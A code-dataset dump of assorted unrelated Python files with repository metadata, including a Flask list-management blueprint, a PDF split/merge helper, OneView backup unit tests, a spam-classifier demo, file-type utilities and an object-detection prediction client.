Handles the POST request to '/update-profile'.
:return: function call to update_item with sent data
"""
return update_item(request.json)
| 33.033333
| 89
| 0.701816
|
from flask import Blueprint, request, render_template, jsonify
from flask_login import current_user
from src.controllers.supporting_lists.manage_lists import manage, update_item
from src.models.type import TypeDataAccess
from src.models.tag import TagDataAccess
from src.models.research_group import *
from src.models.study_field import *
from src.models.employee import *
from src.models.db import get_db
bp = Blueprint('manage_lists', __name__)
@bp.route('/modify-lists', methods=["GET", "POST"])
def modify_lists():
"""
Handles the GET & POST request to '/modify-lists'.
GET: requests to render page
POST: request managing sent data
:return: Json with failure status / template rendering / function call to manage data
"""
if not current_user.is_authenticated or current_user.role == "student":
return jsonify({'success': False}), 400, {'ContentType': 'application/json'}
if request.method == "GET":
return render_template('supporting_lists.html')
else:
return manage(request.json)
@bp.route('/get-all-list-data', methods=['GET'])
def get_all_list_data():
"""
Handles the GET request to '/get-all-list-data'.
:return: Json with all list data
"""
conn = get_db()
all_types = TypeDataAccess(conn).get_types(False)
all_tags = TagDataAccess(conn).get_tags()
all_groups = ResearchGroupDataAccess(conn).get_research_groups(False)
all_employees = EmployeeDataAccess(conn).get_employees(False)
result = {
"types": [obj.to_dict() for obj in all_types],
"tags": all_tags,
"research groups": [obj.to_dict() for obj in all_groups],
"employees": [obj.to_dict() for obj in all_employees]
}
return jsonify(result)
@bp.route("/update-profile", methods=["POST"])
def update_profile():
"""
Handles the POST request to '/update-profile'.
:return: function call to update_item with sent data
"""
return update_item(request.json)
| 0
| 0
| 0
|
5e309a053528b67904d5d5112db0bd96f00b89b5
| 1,204
|
py
|
Python
|
makerbean/PDFBot.py
|
AndersonBY/python-makerbean
|
c7713a019217e7f2eb42010af8f4f6c8a15fa910
|
[
"MIT"
] | 8
|
2020-12-28T12:49:50.000Z
|
2021-04-12T13:49:19.000Z
|
makerbean/PDFBot.py
|
AndersonBY/python-makerbean
|
c7713a019217e7f2eb42010af8f4f6c8a15fa910
|
[
"MIT"
] | null | null | null |
makerbean/PDFBot.py
|
AndersonBY/python-makerbean
|
c7713a019217e7f2eb42010af8f4f6c8a15fa910
|
[
"MIT"
] | 4
|
2021-01-12T07:48:11.000Z
|
2021-04-12T13:49:21.000Z
|
# -*- coding: utf-8 -*-
# @Author: ander
# @Date: 2020-12-22 16:19:51
# @Last Modified by: ander
# @Last Modified time: 2020-12-22 16:25:49
import pdfplumber
from PyPDF2 import PdfFileReader, PdfFileWriter, PdfFileMerger
import os.path
from .utilities import mkdir
class PDFBot(object):
"""docstring for ExcelBot"""
| 30.1
| 85
| 0.649502
|
# -*- coding: utf-8 -*-
# @Author: ander
# @Date: 2020-12-22 16:19:51
# @Last Modified by: ander
# @Last Modified time: 2020-12-22 16:25:49
import pdfplumber
from PyPDF2 import PdfFileReader, PdfFileWriter, PdfFileMerger
import os.path
from .utilities import mkdir
class PDFBot(object):
"""docstring for ExcelBot"""
def __init__(self):
self.page_num = 0
def open(self, file_path):
self.filename, _ = os.path.splitext(os.path.basename(file_path))
self.pdf = pdfplumber.open(file_path)
self.pdf_reader = PdfFileReader(file_path)
self.page_num = self.pdf_reader.getNumPages()
def get_text(self, page):
pdf_page = self.pdf.pages[page]
return pdf_page.extract_text()
def split(self, page, folder):
mkdir(folder)
pdf_writer = PdfFileWriter()
pdf_writer.addPage(self.pdf_reader.getPage(page))
with open(os.path.join(folder, f"{self.filename}-p{page}.pdf"), "wb") as out:
pdf_writer.write(out)
def merge(self, pdfs, merged_name):
merger = PdfFileMerger()
for pdf in pdfs:
merger.append(PdfFileReader(pdf))
merger.write(f"{merged_name}.pdf")
| 743
| 0
| 135
|
7d8042e0a0e082248ae3fb8d16b1773619abf452
| 3,510
|
py
|
Python
|
tests/unit/resources/settings/test_backups.py
|
PragadeeswaranS/oneview-python
|
3acc113b8dd30029beb7c228c3bc2bbe67d3485b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/resources/settings/test_backups.py
|
PragadeeswaranS/oneview-python
|
3acc113b8dd30029beb7c228c3bc2bbe67d3485b
|
[
"Apache-2.0"
] | null | null | null |
tests/unit/resources/settings/test_backups.py
|
PragadeeswaranS/oneview-python
|
3acc113b8dd30029beb7c228c3bc2bbe67d3485b
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
###
# (C) Copyright [2019] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
from unittest import TestCase
import mock
from hpOneView.connection import connection
from hpOneView.resources.settings.backups import Backups
from hpOneView.resources.resource import ResourceClient
| 35.454545
| 118
| 0.74188
|
# -*- coding: utf-8 -*-
###
# (C) Copyright [2019] Hewlett Packard Enterprise Development LP
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
###
from unittest import TestCase
import mock
from hpOneView.connection import connection
from hpOneView.resources.settings.backups import Backups
from hpOneView.resources.resource import ResourceClient
class BackupsTest(TestCase):
def setUp(self):
self.host = '127.0.0.1'
self.connection = connection(self.host)
self._client = Backups(self.connection)
@mock.patch.object(ResourceClient, 'get_collection')
def test_get_all_called_once(self, mock_get_collection):
self._client.get_all()
mock_get_collection.assert_called_once_with('/rest/backups')
@mock.patch.object(ResourceClient, 'get')
def test_get_called_once(self, mock_get):
self._client.get('appliance_backup_2017-04-20_180138')
mock_get.assert_called_once_with('appliance_backup_2017-04-20_180138')
@mock.patch.object(ResourceClient, 'get')
def test_get_with_uri_called_once(self, mock_get):
uri = '/rest/backups/appliance_backup_2017-04-20_180138'
self._client.get(uri)
mock_get.assert_called_once_with(uri)
@mock.patch.object(ResourceClient, 'create_with_zero_body')
def test_create_called_once(self, mock_create):
mock_create.return_value = {}
self._client.create()
mock_create.assert_called_once_with(timeout=-1)
@mock.patch.object(ResourceClient, 'download')
def test_download_called_once_by_id(self, mock_download):
download_uri = '/rest/backups/archive/appliance_backup_2017-04-20_182809'
destination = 'appliance_backup_2017-04-20_180138.bkp'
self._client.download(download_uri, destination)
mock_download.assert_called_once_with('/rest/backups/archive/appliance_backup_2017-04-20_182809', destination)
@mock.patch.object(ResourceClient, 'upload')
def test_upload_artifact_bundle_called_once(self, mock_upload):
filepath = "appliance_backup_2017-04-20_182809.bkp"
self._client.upload(filepath)
mock_upload.assert_called_once_with(filepath)
@mock.patch.object(ResourceClient, 'get')
def test_get_config_called_once(self, mock_get):
self._client.get_config()
mock_get.assert_called_once_with('config')
@mock.patch.object(ResourceClient, 'update')
def test_update_config_called_once(self, mock_update):
options = {"enabled": False}
self._client.update_config(options, timeout=30)
mock_update.assert_called_once_with(options, uri='/rest/backups/config', timeout=30)
@mock.patch.object(ResourceClient, 'update_with_zero_body')
def test_update_remote_archive_called_once(self, mock_update):
save_uri = '/rest/backups/remotearchive/appliance_backup_2017-04-20_182809'
self._client.update_remote_archive(save_uri, timeout=30)
mock_update.update_with_zero_body(uri=save_uri, timeout=30)
| 1,895
| 748
| 23
|
4bc85f8092188613ab654a4c3765404fe3fb867c
| 672
|
py
|
Python
|
airbnb/system/region_revenue.py
|
mpresh/airbnb-tools
|
6f1884082e91ec810ea5667a1b2041ad246ebf7b
|
[
"MIT"
] | 1
|
2017-07-12T16:44:02.000Z
|
2017-07-12T16:44:02.000Z
|
airbnb/system/region_revenue.py
|
mpresh/airbnb-tools
|
6f1884082e91ec810ea5667a1b2041ad246ebf7b
|
[
"MIT"
] | null | null | null |
airbnb/system/region_revenue.py
|
mpresh/airbnb-tools
|
6f1884082e91ec810ea5667a1b2041ad246ebf7b
|
[
"MIT"
] | null | null | null |
import zipcodes
import listings
import bnbcalendar
import finance
from pprint import pprint
if __name__ == "__main__":
region_average_revenue(zipcodes.get_all_cape_cod_zip_codes)
| 33.6
| 80
| 0.733631
|
import zipcodes
import listings
import bnbcalendar
import finance
from pprint import pprint
def region_average_revenue(zipcodes_func, adults=16, state="MA"):
rooms = listings.get_all_listings(zipcodes_func, adults=adults, state=state)
#rooms = ["4914702", "16042826"]
for room in rooms:
print("Getting calendar for {}".format(room))
calendar = bnbcalendar.get_calendar_for_next_year(room, adults=adults-3)
total_revenue = finance.calculate_total_revenue(calendar)
print("listing {} revenue {}".format(room, total_revenue))
if __name__ == "__main__":
region_average_revenue(zipcodes.get_all_cape_cod_zip_codes)
| 455
| 0
| 23
|
2b4944225389f356c9da74143b2cea6864e7e5f4
| 2,458
|
py
|
Python
|
conveniences/demo_mnbc.py
|
mateusnbm/ai-conveniences
|
4a0cd0d761f1d534149f9f0ab03f5f94e4290580
|
[
"MIT"
] | null | null | null |
conveniences/demo_mnbc.py
|
mateusnbm/ai-conveniences
|
4a0cd0d761f1d534149f9f0ab03f5f94e4290580
|
[
"MIT"
] | null | null | null |
conveniences/demo_mnbc.py
|
mateusnbm/ai-conveniences
|
4a0cd0d761f1d534149f9f0ab03f5f94e4290580
|
[
"MIT"
] | null | null | null |
#
# demo_spam_classifier.py
#
# Multinomial Naive Bays Classifier.
#
# Based-on:
#
# https://www.udemy.com/data-science-and-machine-learning-with-python-hands-on/
# http://blog.datumbox.com/machine-learning-tutorial-the-naive-bayes-text-classifier/
#
import os
import io
import numpy
from pandas import DataFrame
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
'''
Convenience functions to read the emails and store their messages and
classes in a pandas dataframe.
'''
'''
Read the data and store it in a pandas dataframe.
'''
data = DataFrame({'message': [], 'class': []})
data = data.append(dataFrameFromDirectory('../datasets/emails/ham', 'ham'))
data = data.append(dataFrameFromDirectory('../datasets/emails/spam', 'spam'))
'''
We pass an array of messages to vectorizer.fit_transform(), it will convert
each word to a global token and count the occurences across all emails.
'''
vectorizer = CountVectorizer()
counts = vectorizer.fit_transform(data['message'].values)
'''
Now we train a Multinomial Naive Bayes Classifier using the frequencies
obtained from last step. We'll use this variant of the algorithm because
our premise is that spams tend to contain certain words that can easily
identify the nefarious purpose of them.
'''
classifier = MultinomialNB()
targets = data['class'].values
classifier.fit(counts, targets)
'''
Run some examples to test the classifier.
'''
examples = ['Free Viagra now!!!', "Hi Bob, how about a game of golf tomorrow?", "Luke... I'm your father."]
example_counts = vectorizer.transform(examples)
predictions = classifier.predict(example_counts)
print(predictions)
| 27.931818
| 107
| 0.684703
|
#
# demo_spam_classifier.py
#
# Multinomial Naive Bays Classifier.
#
# Based-on:
#
# https://www.udemy.com/data-science-and-machine-learning-with-python-hands-on/
# http://blog.datumbox.com/machine-learning-tutorial-the-naive-bayes-text-classifier/
#
import os
import io
import numpy
from pandas import DataFrame
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
'''
Convenience functions to read the emails and store their messages and
classes in a pandas dataframe.
'''
def readFiles(path):
for root, dirnames, filenames in os.walk(path):
for filename in filenames:
path = os.path.join(root, filename)
inBody = False
lines = []
f = io.open(path, 'r', encoding='latin1')
for line in f:
if inBody:
lines.append(line)
elif line == '\n':
inBody = True
f.close()
message = '\n'.join(lines)
yield path, message
def dataFrameFromDirectory(path, classification):
rows = []
index = []
for filename, message in readFiles(path):
rows.append({'message': message, 'class': classification})
index.append(filename)
return DataFrame(rows, index=index)
'''
Read the data and store it in a pandas dataframe.
'''
data = DataFrame({'message': [], 'class': []})
data = data.append(dataFrameFromDirectory('../datasets/emails/ham', 'ham'))
data = data.append(dataFrameFromDirectory('../datasets/emails/spam', 'spam'))
'''
We pass an array of messages to vectorizer.fit_transform(), it will convert
each word to a global token and count the occurences across all emails.
'''
vectorizer = CountVectorizer()
counts = vectorizer.fit_transform(data['message'].values)
'''
Now we train a Multinomial Naive Bayes Classifier using the frequencies
obtained from last step. We'll use this variant of the algorithm because
our premise is that spams tend to contain certain words that can easily
identify the nefarious purpose of them.
'''
classifier = MultinomialNB()
targets = data['class'].values
classifier.fit(counts, targets)
'''
Run some examples to test the classifier.
'''
examples = ['Free Viagra now!!!', "Hi Bob, how about a game of golf tomorrow?", "Luke... I'm your father."]
example_counts = vectorizer.transform(examples)
predictions = classifier.predict(example_counts)
print(predictions)
| 735
| 0
| 46
|
e5ab48881e462aa904536ebf91d486c500e7719a
| 115
|
py
|
Python
|
testing_focus_session/01_unit_tests/03_pytest/02_fixtures/05_request_fixture/test_module.py
|
netanelrevah/testing-focus-session
|
ce1ef76afa444ee50a1d20f0855ae5073ee2c2d9
|
[
"MIT"
] | 1
|
2020-06-26T12:40:38.000Z
|
2020-06-26T12:40:38.000Z
|
testing_focus_session/01_unit_tests/03_pytest/02_fixtures/05_request_fixture/test_module.py
|
netanelrevah/testing-focus-session
|
ce1ef76afa444ee50a1d20f0855ae5073ee2c2d9
|
[
"MIT"
] | null | null | null |
testing_focus_session/01_unit_tests/03_pytest/02_fixtures/05_request_fixture/test_module.py
|
netanelrevah/testing-focus-session
|
ce1ef76afa444ee50a1d20f0855ae5073ee2c2d9
|
[
"MIT"
] | 1
|
2021-10-05T10:29:19.000Z
|
2021-10-05T10:29:19.000Z
|
ports = [80, 433, 8080, 8000]
| 16.428571
| 34
| 0.652174
|
ports = [80, 433, 8080, 8000]
def test_connections(connections):
for c in connections:
print(c.port)
| 61
| 0
| 23
|
3f2201b86a9fcb9ecd7c3f12b0c04d9a9eeca535
| 6,660
|
py
|
Python
|
src/commoncode/filetype.py
|
Pratikrocks/commoncode
|
02fb544869708607997bbf3440e1b402c68a3164
|
[
"Apache-2.0"
] | 2
|
2020-09-28T10:12:28.000Z
|
2021-01-15T11:16:44.000Z
|
src/commoncode/filetype.py
|
Pratikrocks/commoncode
|
02fb544869708607997bbf3440e1b402c68a3164
|
[
"Apache-2.0"
] | 28
|
2020-11-13T01:39:37.000Z
|
2022-03-28T20:14:50.000Z
|
src/commoncode/filetype.py
|
Pratikrocks/commoncode
|
02fb544869708607997bbf3440e1b402c68a3164
|
[
"Apache-2.0"
] | 6
|
2020-11-18T00:16:18.000Z
|
2021-09-01T09:01:11.000Z
|
#
# Copyright (c) nexB Inc. and others. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/commoncode for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import os
from datetime import datetime
from commoncode.system import on_posix
from commoncode.functional import memoize
"""
Low level file type utilities, essentially a wrapper around os.path and stat.
"""
def is_link(location):
"""
Return True if `location` is a symbolic link.
"""
return location and os.path.islink(location)
def is_file(location, follow_symlinks=False):
"""
Return True if `location` is a file.
"""
_is_file = location and os.path.isfile(location)
if follow_symlinks:
return _is_file
return _is_file and not is_link(location) and not is_broken_link(location)
def is_dir(location, follow_symlinks=False):
"""
Return True if `location` is a directory.
"""
_is_dir = location and os.path.isdir(location) and not is_file(location)
if follow_symlinks:
return _is_dir
return _is_dir and not is_link(location) and not is_broken_link(location)
def is_regular(location):
"""
Return True if `location` is regular. A regular location is a file or a
dir and not a special file or symlink.
"""
return location and (is_file(location) or is_dir(location))
def is_special(location):
"""
Return True if `location` is a special file . A special file is not a
regular file, i.e. anything such as a broken link, block file, fifo,
socket, character device or else.
"""
return not is_regular(location)
def is_broken_link(location):
"""
Return True if `location` is a broken link.
"""
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
target = get_link_target(location)
target_loc = os.path.join(os.path.dirname(location), target)
return target and not os.path.exists(target_loc)
def get_link_target(location):
"""
Return the link target for `location` if this is a Link or an empty
string.
"""
target = ''
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
try:
# return false on OSes not supporting links
target = os.readlink(location)
except UnicodeEncodeError:
# location is unicode but readlink can fail in some cases
pass
return target
# Map of type checker function -> short type code
# The order of types check matters: link -> file -> directory -> special
TYPES = dict([
(is_link, ('l', 'link',)),
(is_file, ('f', 'file',)),
(is_dir, ('d', 'directory',)),
(is_special, ('s', 'special',))
])
def get_type(location, short=True):
"""
Return the type of the `location` or None if it does not exist.
Return the short form (single character) or long form if short=False
"""
if location:
for type_checker in TYPES:
tc = type_checker(location)
if tc:
short_form, long_form = TYPES[type_checker]
return short and short_form or long_form
def is_readable(location):
"""
Return True if the file at location has readable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.X_OK)
else:
return os.access(location, os.R_OK)
def is_writable(location):
"""
Return True if the file at location has writeable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.R_OK | os.W_OK)
def is_executable(location):
"""
Return True if the file at location has executable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.X_OK)
def is_rwx(location):
"""
Return True if the file at location has read, write and executable
permission set. Does not follow links.
"""
return is_readable(location) and is_writable(location) and is_executable(location)
def get_last_modified_date(location):
"""
Return the last modified date stamp of a file as YYYYMMDD format. The date
of non-files (dir, links, special) is always an empty string.
"""
yyyymmdd = ''
if is_file(location):
utc_date = datetime.isoformat(
datetime.utcfromtimestamp(os.path.getmtime(location))
)
yyyymmdd = utc_date[:10]
return yyyymmdd
counting_functions = {
'file_count': lambda _: 1,
'file_size': os.path.getsize,
}
@memoize
def counter(location, counting_function):
"""
Return a count for a single file or a cumulative count for a directory
tree at `location`.
Get a callable from the counting_functions registry using the
`counting_function` string. Call this callable with a `location` argument
to determine the count value for a single file. This allow memoization
with hashable arguments.
Only regular files and directories have a count. The count for a directory
is the recursive count sum of the directory file and directory
descendants.
Any other file type such as a special file or link has a zero size. Does
not follow links.
"""
if not (is_file(location) or is_dir(location)):
return 0
count = 0
if is_file(location):
count_fun = counting_functions[counting_function]
return count_fun(location)
elif is_dir(location):
count += sum(counter(os.path.join(location, p), counting_function)
for p in os.listdir(location))
return count
def get_file_count(location):
"""
Return the cumulative number of files in the directory tree at `location`
or 1 if `location` is a file. Only regular files are counted. Everything
else has a zero size.
"""
return counter(location, 'file_count')
def get_size(location):
"""
Return the size in bytes of a file at `location` or if `location` is a
directory, the cumulative size of all files in this directory tree. Only
regular files have a size. Everything else has a zero size.
"""
return counter(location, 'file_size')
| 29.469027
| 86
| 0.666066
|
#
# Copyright (c) nexB Inc. and others. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
# See http://www.apache.org/licenses/LICENSE-2.0 for the license text.
# See https://github.com/nexB/commoncode for support or download.
# See https://aboutcode.org for more information about nexB OSS projects.
#
import os
from datetime import datetime
from commoncode.system import on_posix
from commoncode.functional import memoize
"""
Low level file type utilities, essentially a wrapper around os.path and stat.
"""
def is_link(location):
"""
Return True if `location` is a symbolic link.
"""
return location and os.path.islink(location)
def is_file(location, follow_symlinks=False):
"""
Return True if `location` is a file.
"""
_is_file = location and os.path.isfile(location)
if follow_symlinks:
return _is_file
return _is_file and not is_link(location) and not is_broken_link(location)
def is_dir(location, follow_symlinks=False):
"""
Return True if `location` is a directory.
"""
_is_dir = location and os.path.isdir(location) and not is_file(location)
if follow_symlinks:
return _is_dir
return _is_dir and not is_link(location) and not is_broken_link(location)
def is_regular(location):
"""
Return True if `location` is regular. A regular location is a file or a
dir and not a special file or symlink.
"""
return location and (is_file(location) or is_dir(location))
def is_special(location):
"""
Return True if `location` is a special file . A special file is not a
regular file, i.e. anything such as a broken link, block file, fifo,
socket, character device or else.
"""
return not is_regular(location)
def is_broken_link(location):
"""
Return True if `location` is a broken link.
"""
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
target = get_link_target(location)
target_loc = os.path.join(os.path.dirname(location), target)
return target and not os.path.exists(target_loc)
def get_link_target(location):
"""
Return the link target for `location` if this is a Link or an empty
string.
"""
target = ''
# always false on windows, until Python supports junctions/links
if on_posix and is_link(location):
try:
# return false on OSes not supporting links
target = os.readlink(location)
except UnicodeEncodeError:
# location is unicode but readlink can fail in some cases
pass
return target
# Map of type checker function -> short type code
# The order of types check matters: link -> file -> directory -> special
TYPES = dict([
(is_link, ('l', 'link',)),
(is_file, ('f', 'file',)),
(is_dir, ('d', 'directory',)),
(is_special, ('s', 'special',))
])
def get_type(location, short=True):
"""
Return the type of the `location` or None if it does not exist.
Return the short form (single character) or long form if short=False
"""
if location:
for type_checker in TYPES:
tc = type_checker(location)
if tc:
short_form, long_form = TYPES[type_checker]
return short and short_form or long_form
def is_readable(location):
"""
Return True if the file at location has readable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.X_OK)
else:
return os.access(location, os.R_OK)
def is_writable(location):
"""
Return True if the file at location has writeable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.R_OK | os.W_OK)
def is_executable(location):
"""
Return True if the file at location has executable permission set.
Does not follow links.
"""
if location:
if is_dir(location):
return os.access(location, os.R_OK | os.W_OK | os.X_OK)
else:
return os.access(location, os.X_OK)
def is_rwx(location):
"""
Return True if the file at location has read, write and executable
permission set. Does not follow links.
"""
return is_readable(location) and is_writable(location) and is_executable(location)
def get_last_modified_date(location):
"""
Return the last modified date stamp of a file as YYYYMMDD format. The date
of non-files (dir, links, special) is always an empty string.
"""
yyyymmdd = ''
if is_file(location):
utc_date = datetime.isoformat(
datetime.utcfromtimestamp(os.path.getmtime(location))
)
yyyymmdd = utc_date[:10]
return yyyymmdd
counting_functions = {
'file_count': lambda _: 1,
'file_size': os.path.getsize,
}
@memoize
def counter(location, counting_function):
"""
Return a count for a single file or a cumulative count for a directory
tree at `location`.
Get a callable from the counting_functions registry using the
`counting_function` string. Call this callable with a `location` argument
to determine the count value for a single file. This allow memoization
with hashable arguments.
Only regular files and directories have a count. The count for a directory
is the recursive count sum of the directory file and directory
descendants.
Any other file type such as a special file or link has a zero size. Does
not follow links.
"""
if not (is_file(location) or is_dir(location)):
return 0
count = 0
if is_file(location):
count_fun = counting_functions[counting_function]
return count_fun(location)
elif is_dir(location):
count += sum(counter(os.path.join(location, p), counting_function)
for p in os.listdir(location))
return count
def get_file_count(location):
"""
Return the cumulative number of files in the directory tree at `location`
or 1 if `location` is a file. Only regular files are counted. Everything
else has a zero size.
"""
return counter(location, 'file_count')
def get_size(location):
"""
Return the size in bytes of a file at `location` or if `location` is a
directory, the cumulative size of all files in this directory tree. Only
regular files have a size. Everything else has a zero size.
"""
return counter(location, 'file_size')
| 0
| 0
| 0
|
05aeadad29492f4792dc64b4e5f1e4699b3a1866
| 1,522
|
py
|
Python
|
object_detection/serving_script/predict.py
|
qq2016/kubeflow_learning
|
930706686108f997aab42ccf2fe455dcf09a4afc
|
[
"Apache-2.0"
] | 1,165
|
2018-03-01T01:47:14.000Z
|
2022-03-31T08:35:00.000Z
|
object_detection/serving_script/predict.py
|
arki1/examples
|
c93b792d67c8c52bc91d4ccf5fbaead4e2324331
|
[
"Apache-2.0"
] | 929
|
2018-02-04T18:20:16.000Z
|
2022-03-31T18:20:43.000Z
|
object_detection/serving_script/predict.py
|
arki1/examples
|
c93b792d67c8c52bc91d4ccf5fbaead4e2324331
|
[
"Apache-2.0"
] | 687
|
2018-02-01T21:35:30.000Z
|
2022-03-29T07:47:47.000Z
|
""" Script to send prediction request.
Usage:
python predict.py --url=YOUR_KF_HOST/models/coco --input_image=YOUR_LOCAL_IMAGE
--output_image=OUTPUT_IMAGE_NAME.
This will save the prediction result as OUTPUT_IMAGE_NAME.
The output image is the input image with the detected bounding boxes.
"""
import argparse
import json
import requests
import numpy as np
from PIL import Image
import visualization_utils as vis_util
WIDTH = 1024
HEIGHT = 768
if __name__ == '__main__':
main()
| 27.178571
| 81
| 0.729304
|
""" Script to send prediction request.
Usage:
python predict.py --url=YOUR_KF_HOST/models/coco --input_image=YOUR_LOCAL_IMAGE
--output_image=OUTPUT_IMAGE_NAME.
This will save the prediction result as OUTPUT_IMAGE_NAME.
The output image is the input image with the detected bounding boxes.
"""
import argparse
import json
import requests
import numpy as np
from PIL import Image
import visualization_utils as vis_util
WIDTH = 1024
HEIGHT = 768
def main():
parser = argparse.ArgumentParser()
parser.add_argument("--url", help='The url to send the request')
parser.add_argument("--input_image", default='image1.jpg')
parser.add_argument("--output_image", default='output.jpg')
args = parser.parse_args()
img = Image.open(args.input_image)
img = img.resize((WIDTH, HEIGHT), Image.ANTIALIAS)
img_np = np.array(img)
res = requests.post(
args.url,
data=json.dumps({"instances": [{"inputs": img_np.tolist()}]}))
if res.status_code != 200:
print('Failed: {}'.format(res.text))
return
output_dict = json.loads(res.text).get('predictions')[0]
vis_util.visualize_boxes_and_labels_on_image_array(
img_np,
np.array(output_dict['detection_boxes']),
map(int, output_dict['detection_classes']),
output_dict['detection_scores'],
{},
instance_masks=output_dict.get('detection_masks'),
use_normalized_coordinates=True,
line_thickness=8)
output_image = Image.fromarray(img_np)
output_image.save(args.output_image)
if __name__ == '__main__':
main()
| 1,009
| 0
| 23
|
835a69e7ee6ae96c62b6be6b24e176d61f9beb24
| 151
|
py
|
Python
|
src/polls/tests/functional_tests.py
|
ikos289/docker-django
|
6fa50df751e357b82b686d15b16891210e506430
|
[
"MIT"
] | null | null | null |
src/polls/tests/functional_tests.py
|
ikos289/docker-django
|
6fa50df751e357b82b686d15b16891210e506430
|
[
"MIT"
] | null | null | null |
src/polls/tests/functional_tests.py
|
ikos289/docker-django
|
6fa50df751e357b82b686d15b16891210e506430
|
[
"MIT"
] | null | null | null |
from selenium import webdriver
browser = webdriver.Firefox()
browser.get('http://0.0.0.0:8000')
print(browser.title)
assert 'Django' in browser.title
| 21.571429
| 34
| 0.761589
|
from selenium import webdriver
browser = webdriver.Firefox()
browser.get('http://0.0.0.0:8000')
print(browser.title)
assert 'Django' in browser.title
| 0
| 0
| 0
|
a72428b374da27389d79bf99ef277a86b1fa5dd6
| 509
|
py
|
Python
|
src/olympia/stats/migrations/0005_create_switch_bigquery_download_stats_cron_tasks.py
|
shashwatsingh/addons-server
|
8fce98901104349055a828b5a47865f5e8f4120b
|
[
"BSD-3-Clause"
] | 843
|
2016-02-09T13:00:37.000Z
|
2022-03-20T19:17:06.000Z
|
src/olympia/stats/migrations/0005_create_switch_bigquery_download_stats_cron_tasks.py
|
shashwatsingh/addons-server
|
8fce98901104349055a828b5a47865f5e8f4120b
|
[
"BSD-3-Clause"
] | 10,187
|
2016-02-05T23:51:05.000Z
|
2022-03-31T15:24:44.000Z
|
src/olympia/stats/migrations/0005_create_switch_bigquery_download_stats_cron_tasks.py
|
shashwatsingh/addons-server
|
8fce98901104349055a828b5a47865f5e8f4120b
|
[
"BSD-3-Clause"
] | 551
|
2016-02-08T20:32:16.000Z
|
2022-03-15T16:49:24.000Z
|
# Generated by Django 2.2.13 on 2020-07-23 16:13
from django.db import migrations
| 25.45
| 61
| 0.707269
|
# Generated by Django 2.2.13 on 2020-07-23 16:13
from django.db import migrations
def create_waffle_switch(apps, schema_editor):
Switch = apps.get_model('waffle', 'Switch')
Switch.objects.create(
name='use-bigquery-for-download-stats-cron',
active=False,
note='Use BigQuery in download stats cron tasks',
)
class Migration(migrations.Migration):
dependencies = [('stats', '0004_delete_updatecount')]
operations = [migrations.RunPython(create_waffle_switch)]
| 239
| 139
| 46
|
800e3537aea3f08140b4b85867fd724bf0b52669
| 1,055
|
py
|
Python
|
mmaction/models/losses/__init__.py
|
ovshake/mmaction2
|
71e92e9d4c28190d485ba153aae5200bf71f70b1
|
[
"Apache-2.0"
] | null | null | null |
mmaction/models/losses/__init__.py
|
ovshake/mmaction2
|
71e92e9d4c28190d485ba153aae5200bf71f70b1
|
[
"Apache-2.0"
] | null | null | null |
mmaction/models/losses/__init__.py
|
ovshake/mmaction2
|
71e92e9d4c28190d485ba153aae5200bf71f70b1
|
[
"Apache-2.0"
] | null | null | null |
# Copyright (c) OpenMMLab. All rights reserved.
from .base import BaseWeightedLoss
from .binary_logistic_regression_loss import BinaryLogisticRegressionLoss
from .bmn_loss import BMNLoss
from .cross_entropy_loss import BCELossWithLogits, CrossEntropyLoss
from .hvu_loss import HVULoss
from .nll_loss import NLLLoss
from .ohem_hinge_loss import OHEMHingeLoss
from .ssn_loss import SSNLoss
from .slowfast_selfsupervised_loss import SlowFastSelfSupervisedLoss, ContrastiveLoss, SingleInstanceContrastiveLoss, SingleInstanceContrastiveLossv2
from .multiple_contrastive_loss import MultipleContrastiveLoss, MultipleContrastiveSingleInstanceLoss
from .moco_loss import MocoLoss
__all__ = [
'BaseWeightedLoss', 'CrossEntropyLoss', 'NLLLoss', 'BCELossWithLogits',
'BinaryLogisticRegressionLoss', 'BMNLoss', 'OHEMHingeLoss', 'SSNLoss',
'HVULoss', 'SlowFastSelfSupervisedLoss', 'MultipleContrastiveLoss',
'ContrastiveLoss', 'MocoLoss', 'SingleInstanceContrastiveLoss', 'MultipleContrastiveSingleInstanceLoss', 'SingleInstanceContrastiveLossv2'
]
| 50.238095
| 149
| 0.842654
|
# Copyright (c) OpenMMLab. All rights reserved.
from .base import BaseWeightedLoss
from .binary_logistic_regression_loss import BinaryLogisticRegressionLoss
from .bmn_loss import BMNLoss
from .cross_entropy_loss import BCELossWithLogits, CrossEntropyLoss
from .hvu_loss import HVULoss
from .nll_loss import NLLLoss
from .ohem_hinge_loss import OHEMHingeLoss
